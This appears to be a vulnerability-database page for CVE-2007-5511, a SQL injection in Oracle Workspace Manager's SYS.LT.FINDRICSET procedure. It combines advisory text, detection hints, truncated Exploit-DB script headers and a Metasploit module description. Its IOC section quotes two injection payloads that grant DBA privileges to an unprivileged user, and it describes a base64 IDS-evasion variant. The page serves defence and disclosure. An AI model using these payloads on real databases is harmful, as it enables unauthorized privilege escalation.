CVE-2007-5511
published 2007-10-17CVE-2007-5511: SQL injection vulnerability in Workspace Manager for Oracle Database before OWM 10.2.0.4.1, OWM 10.1.0.8.0, and OWM 9.2.0.8.0 allows attackers to execute…
PriorityP348medium6.5CVSS 2.0
AVNACLAuSCPIPAP
EXPLOIT
EPSS
31.76%
98.1th percentile
SQL injection vulnerability in Workspace Manager for Oracle Database before OWM 10.2.0.4.1, OWM 10.1.0.8.0, and OWM 9.2.0.8.0 allows attackers to execute arbitrary SQL commands via the FINDRICSET procedure in the LT package. NOTE: this is probably covered by CVE-2007-5510, but there are insufficient details to be certain.
Detection & IOCsextracted from sources · hover to see the quote
commandSYS.LT.FINDRICSET('TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp''||dbms_sql.execute('||c2gya2Vy||')||''','DEADBEAF')↗
commandDBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''GRANT DBA TO <user>'';commit;end;',0)↗
- →Detect SQL injection attempts targeting SYS.LT.FINDRICSET with cursor injection payload — look for the string 'dbms_sql.execute' concatenated inside the first argument of SYS.LT.FINDRICSET calls in Oracle audit/SQL logs. ↗
- →Alert on creation of a user-owned function named 'OWN' with AUTHID CURRENT_USER and PRAGMA AUTONOMOUS_TRANSACTION containing EXECUTE IMMEDIATE 'GRANT DBA', which is the first-variant exploit technique. ↗
- →Monitor Oracle audit trails for unprivileged users receiving GRANT DBA immediately following execution of SYS.LT.FINDRICSET, as the exploit's goal is privilege escalation to DBA. ↗
- →The Metasploit auxiliary module 'auxiliary/sqli/oracle/lt_findricset_cursor' can be used to test for this vulnerability; presence of this module in use against Oracle 10.1.0.3.0–10.1.0.5.0 and 11g should be flagged. ↗
- ·The exploit requires the attacker to already have a valid Oracle database account (unprivileged user); it does not provide unauthenticated access — it is a privilege escalation from any DB user to DBA. ↗
- ·The vulnerability was fixed in Oracle Critical Patch Update October 2007; affected versions are OWM 10.2.0 before 10.2.0.4.1, OWM 10.1.0 before 10.1.0.8.0, and OWM 9.2.0 before 9.2.0.8.0. ↗
- ·The IDS-evasion variant (4572) uses UTL_ENCODE BASE64 decoding to hide the GRANT DBA payload from signature-based detection; plain-text string matching on 'GRANT DBA' will miss this variant. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mv98-3pjv-4gv2: SQL injection vulnerability in Workspace Manager for Oracle Database before OWM 10
ghsa_unreviewed·2022-05-01·CVSS 6.5
CVE-2007-5511 [MEDIUM] CWE-89 GHSA-mv98-3pjv-4gv2: SQL injection vulnerability in Workspace Manager for Oracle Database before OWM 10
SQL injection vulnerability in Workspace Manager for Oracle Database before OWM 10.2.0.4.1, OWM 10.1.0.8.0, and OWM 9.2.0.8.0 allows attackers to execute arbitrary SQL commands via the FINDRICSET procedure in the LT package. NOTE: this is probably covered by CVE-2007-5510, but there are insufficient details to be certain.
GHSA
GHSA-mfm4-69wq-jq8q: Multiple unspecified vulnerabilities in the Workspace Manager component in Oracle Database before OWM 10
ghsa_unreviewed·2022-05-01·CVSS 6.5
CVE-2007-5510 [MEDIUM] GHSA-mfm4-69wq-jq8q: Multiple unspecified vulnerabilities in the Workspace Manager component in Oracle Database before OWM 10
Multiple unspecified vulnerabilities in the Workspace Manager component in Oracle Database before OWM 10.2.0.4.1, OWM 10.1.0.8.0, and OWM 9.2.0.8.0 have unknown impact and remote attack vectors, aka (1) DB08, (2) DB09, (3) DB10, (4) DB11, (5) DB12, (6) DB13, (7) DB14, (8) DB15, (9) DB16, (10) DB17, and (11) DB18. NOTE: one of these issues is probably CVE-2007-5511, but there are insufficient details to be certain.
No detection rules found.
Exploit-DB
Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2)
exploitdb·2007-10-27
CVE-2007-5511 Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2)
Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2)
---
#!/usr/bin/perl
#
# http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricsetV2.pl
#
# Oracle SYS.LT.FINDRICSET exploit (11g/10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privilege needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.5.0"
#
# Fixed with CPU Oct. 2007
#
# REF: Thanks to Joxean Koret and his excellent Inguma
# http://sourceforge.net/projects/inguma
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Fri Oct 26 15:03:46 CEST 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Or
Exploit-DB
Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1)
exploitdb·2007-10-27
CVE-2007-5511 Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1)
Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1)
---
#!/usr/bin/perl
#
# http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricset.pl
#
# Oracle SYS.LT.FINDRICSET exploit (11g/10g)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.5.0"
#
# Fixed with CPU Oct. 2007
#
# REF: Thanks to Joxean Koret and his excellent Inguma
# http://sourceforge.net/projects/inguma
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Fri Oct 26 15:03:46 CEST 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -r
# [-] Wait...
# [-] Revoking DBA from SFIGATO...
# DBD::Oracle
Exploit-DB
Oracle 10g - 'LT.FINDRICSET' SQL Injection (IDS Evasion)
exploitdb·2007-10-27
CVE-2007-5511 Oracle 10g - 'LT.FINDRICSET' SQL Injection (IDS Evasion)
Oracle 10g - 'LT.FINDRICSET' SQL Injection (IDS Evasion)
---
/******************************************************************/
/******* Oracle 10g LT.FINDRICSET SQL Injection Exploit **********/
/******************************************************************/
/*********** sploit grant DBA to scott **************/
/*********** evil cursor injection **************/
/*********** No "create procedure" privileg needed! **************/
/*********** + Funny IDS evasion vith base64 **************/
/******************************************************************/
/***************** tested on oracle 10.1.0.2.0 *******************/
/******************************************************************/
/******************************************************************/
/* Date of Public EXP
Metasploit
Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method
metasploit
Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method
Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method
This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.LT.FINDRICSET package via Evil Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical Patch update October 2007.
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=119332677525918&w=2http://osvdb.org/40079http://secunia.com/advisories/27251http://secunia.com/advisories/27409http://securityreason.com/securityalert/3245http://www.securityfocus.com/archive/1/482429/100/0/threadedhttp://www.securityfocus.com/bid/26098http://www.securitytracker.com/id?1018823http://www.vupen.com/english/advisories/2007/3524http://www.vupen.com/english/advisories/2007/3626https://www.exploit-db.com/exploits/4570https://www.exploit-db.com/exploits/4571https://www.exploit-db.com/exploits/4572http://marc.info/?l=bugtraq&m=119332677525918&w=2http://osvdb.org/40079http://secunia.com/advisories/27251http://secunia.com/advisories/27409http://securityreason.com/securityalert/3245http://www.securityfocus.com/archive/1/482429/100/0/threadedhttp://www.securityfocus.com/bid/26098http://www.securitytracker.com/id?1018823http://www.vupen.com/english/advisories/2007/3524http://www.vupen.com/english/advisories/2007/3626https://www.exploit-db.com/exploits/4570https://www.exploit-db.com/exploits/4571https://www.exploit-db.com/exploits/4572
2007-10-17
Published